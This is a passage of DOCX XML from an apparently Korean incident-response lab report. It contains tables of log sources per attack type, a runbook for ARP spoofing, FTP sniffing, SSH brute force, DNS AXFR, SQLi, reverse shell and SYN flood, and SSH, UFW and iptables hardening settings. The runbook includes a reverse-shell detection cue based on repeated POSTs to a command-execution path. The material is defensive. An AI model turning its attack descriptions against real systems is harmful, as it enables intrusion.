            <w:tcW w:w="2608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>웹 공격(정찰/SQLi/Command Injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>access.log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>error.log, WAF 로그(있을 시)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>원본 파일 또는 캡처</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>SSH 정찰/브루트포스/침해</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>auth.log(/secure)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>sshd 설정 파일 변경 이력</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>원본 파일 또는 캡처</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>DNS AXFR/의심 질의</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>syslog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>named 로그(있을 시)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>원본 파일 또는 캡처</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>DoS 의심</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>kern.log/dmesg</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>방화벽/라우터 로그</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>원본 파일 또는 캡처</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5-10. 시나리오별 대응 Runbook(요약)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w="1474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공격 유형</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041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초기 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608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즉시 차단(예시)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608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재발방지(예시)</w:t>
            </w:r>
          </w:p>
        </w:tc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증빙 ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>ARP Spoofing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>동일 IP의 MAC 변경 반복 여부</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>스위치 보안 기능/정적 ARP 적용(환경에 따라)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>네트워크 분리, ARP 모니터링(arpwatch) 적용</w:t>
            </w:r>
          </w:p>
        </w:tc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</w:rPr>
              <w:t>WS-5-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>FTP 스니핑</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Payload 내 계정정보 노출 여부</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>FTP 차단/계정 비밀번호 변경</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>SFTP/FTPS 전환, 평문 서비스 제거</w:t>
            </w:r>
          </w:p>
        </w:tc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</w:rPr>
              <w:t>WS-5-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>SSH 정찰/브루트</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>auth.log에서 반복 실패/스캔 패턴</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>UFW 접근대역 제한 + iptables recent 자동 차단</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>키 기반 인증 강제, root 원격 로그인 금지</w:t>
            </w:r>
          </w:p>
        </w:tc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</w:rPr>
              <w:t>LOG-5-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>DNS AXFR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>syslog에 AXFR started/ended</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>TCP 53 차단(Secondary DNS만 허용)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>DNS 설정 allow-transfer 제한</w:t>
            </w:r>
          </w:p>
        </w:tc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</w:rPr>
              <w:t>LOG-5-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>웹 정찰/SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>access.log에서 비정상 경로/페이로드</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>(내부 서비스일 경우) 80/443 접근대역 제한</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>WAF/입력검증/파라미터 바인딩 적용</w:t>
            </w:r>
          </w:p>
        </w:tc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</w:rPr>
              <w:t>LOG-5-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Reverse Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>/vulnerabilities/exec/ 반복 POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>의심 IP 차단, 아웃바운드(egress) 제한</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>취약 기능 제거/패치, 권한 최소화</w:t>
            </w:r>
          </w:p>
        </w:tc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</w:rPr>
              <w:t>LOG-5-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>DoS(SYN Flood)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>kern.log/dmesg 경고 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>율제한/상위 장비 차단(ACL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>서비스 보호(캐시/레이트리밋), 모니터링 강화</w:t>
            </w:r>
          </w:p>
        </w:tc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</w:rPr>
              <w:t>LOG-5-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5-11. 차단 정책(예시) 적용 요약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3213"/>
        <w:gridCol w:w="3213"/>
        <w:gridCol w:w="3213"/>
      </w:tblGrid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항목</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3628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정책/설정</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3742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설명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SSH root 로그인 차단</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3628" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>PermitRootLogin no</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3742" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>root 직접 로그인 금지(일반 계정 + sudo)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SSH 비밀번호 로그인 금지</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3628" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>PasswordAuthentication no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>PubkeyAuthentication yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3742" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Brute Force 원천 차단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UFW SSH 접근대역 제한</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3628" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>ufw allow from &lt;관리망IP&gt; to any port 22 proto tcp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>ufw deny 22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3742" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>관리망/점프서버만 허용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iptables Brute Force 차단</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3628" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>-m recent --seconds 60 --hitcount 5 -j DROP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3742" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>60초 내 5회 이상 신규 연결 차단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DNS AXFR 차단</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3628" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>UDP 53 허용, TCP 53 기본 차단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>Secondary DNS만 TCP 53 허용</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3742" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>AXFR은 TCP 53 기반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웹 접근 통제(선택)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3628" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>80/443: &lt;TRUSTED_NET&gt;만 허용 후 DROP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3742" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>내부 전용 서비스 전제</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>그림 5-7. 차단 정책 적용 터미널 출력(증빙)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638"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="3118" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963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i/>
              </w:rPr>
              <w:t>[증빙자료 삽입 위치]  ID: TERM-5-05</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:t>sshd_config/UFW/iptables 적용 및 status/규칙 확인 화면 삽입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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
        </w:rPr>
        <w:t>5.3 보안 정책 구현</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
        </w:rPr>
        <w:t>보안 정책 구현은 ‘탐지(Detect)–차단(Prevent)–운영(Operate)’ 관점에서 정리하였으며, 각 항목은 적용 여부와 검증 방법(증빙)을 명확히 기록하도록 구성하였다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5-12. 보안 정책 구현 매트릭스(요약)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영역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정책 항목</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474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구현 위치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구현 내용(요약)</w:t>
            </w:r>
          </w:p>
        </w:tc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상태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검증/증빙</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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계정/접근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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>SSH root 직접 로그인 차단</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>서버(SSHD)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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>PermitRootLogin no</w:t>
            </w:r>
          </w:p>
        </w:tc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TERM-5-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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계정/접근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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>SSH 패스워드 로그인 금지</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>서버(SSHD)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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>PasswordAuthentication no</w:t>
